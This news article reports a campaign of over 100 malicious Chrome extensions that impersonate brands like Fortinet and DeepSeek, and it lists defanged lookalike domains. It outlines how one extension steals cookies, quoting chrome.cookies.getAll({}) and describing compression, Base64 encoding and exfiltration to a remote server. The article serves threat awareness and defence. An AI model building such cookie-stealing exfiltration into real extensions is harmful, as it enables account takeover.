A widespread campaign targeting Chrome browser users is using over 100 malicious extensions to steal data, inject remote scripts, and manipulate network traffic through the Google Chrome Web Store. These extensions mimic popular brands such as Fortinet, YouTube, DeepSeek AI, and Calendly.
Discovered by DomainTools researchers, the operation involves a network of fake domains that promote these extensions, increasing the likelihood of user downloads via malvertising. The campaign impersonates legitimate tools including VPNs, AI assistants, and crypto utilities, offering some expected functionality while secretly enabling backdoor access to user data.
“The Chrome Web Store has removed multiple of the actor’s malicious extensions after malware identification,” said the researchers.
“However, the actor’s persistence and the time lag in detection and removal pose a threat to users seeking productivity tools and browser enhancements.”
Extensions Used to Steal Cookies, Inject Code, and Act as Proxies
Once installed, the malicious Chrome extensions request dangerous permissions that allow them to:
- Steal browser cookies, including session tokens
- Perform DOM-based phishing
- Dynamically inject remote JavaScript code
- Act as network proxies
- Modify browser traffic to deliver ads or redirect sessions
One such extension, “fortivpn,” was observed using chrome.cookies.getAll({}) to capture all browser cookies. It compresses the data with Pako, encodes it in Base64, and sends it to a remote server (infograph[.]top).
The same extension can establish WebSocket connections and act as a proxy server, potentially rerouting user traffic through attacker-controlled infrastructure. It also supports proxy authentication, enabling more covert surveillance.
Fake Domains Impersonating Brands Found Across Campaign
DomainTools listed numerous fake domains pushing these malicious Chrome extensions, including:
forti-vpn[.]com,fortivnp[.]comyoutube-vision[.]com,youtube-vision[.]worlddeepseek-ai[.]linkcalendlydocker[.]com,calendly-director[.]comearthvpn[.]top,raccoon-vpn[.]worldmadgicxads[.]world,madgicx-plus[.]comworkfront-plus[.]com,flight-radar[.]life
These sites include deceptive “Add to Chrome” buttons that link directly to the Chrome Web Store, falsely reinforcing legitimacy.
While Google has removed many of the malicious extensions, some remain active, posing ongoing risk to users who seek browser enhancements or security tools.
Risks Include Account Takeover and Corporate Network Breaches
By stealing session cookies and acting as network proxies, the extensions allow attackers to:
- Hijack online accounts
- Monitor browsing behavior
- Gain unauthorized access to internal enterprise systems
- Breach corporate VPN devices or platforms
These extensions effectively give attackers full visibility into the user’s online activity and enable them to bypass authentication mechanisms by reusing stolen session tokens.
Security Recommendations for Enterprise Users
Enterprises are advised to:
- Scrutinize Chrome extension permissions before deployment
- Limit installation to extensions from known, trusted publishers
- Review extension reviews and publisher reputation
- Conduct browser extension audits across managed devices
The operation highlights how browser-based threats remain a significant vector for data theft and corporate compromise, especially when leveraging trusted platforms like the Chrome Web Store.
